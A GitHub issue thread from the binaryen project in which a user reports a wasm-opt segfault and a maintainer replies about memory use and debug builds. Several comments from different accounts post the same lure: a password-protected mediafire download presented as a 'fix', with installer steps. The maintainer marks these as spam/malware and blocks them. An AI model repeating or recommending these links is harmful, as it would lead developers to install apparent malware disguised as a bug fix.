### ISSUE TITLE
wasm-opt segfault

### ISSUE THREAD

**Issue by Matheus28** [WebAssembly/binaryen#6875]
Command line:
```
em++: error: '(omitted for brevity)/emsdk/upstream\bin\wasm-opt --strip-target-features --post-emscripten -O3 --low-memory-unused --zero-filled-memory --pass-arg=directize-initial-contents-immutable html/client.wasm -o html/client.wasm --mvp-features --enable-multivalue --enable-mutable-globals --enable-reference-types --enable-sign-ext' failed (returned 3221225477)
```

[This is a zip of the problematic wasm.](https://github.com/user-attachments/files/16755652/client.zip)

My apologies for not providing a stack trace, I don't have symbols available for wasm-opt and I'm not sure where to get them.

Note that this happens in the wasm-opt included with emscripten 3.1.65.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kripken** [comment]
(spam/malware comments reported and blocked)

**Comment by kripken** [comment]
@Matheus28 I can't reproduce the problem on a Linux machine with latest Binaryen. It does take some time to run and uses around 500 MB - were you running this on a machine with low RAM perhaps?

If it's not that, building Binaryen from source will generate a build with debug symbols by default I believe (at least on Linux it does - I hope also on Windows).

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
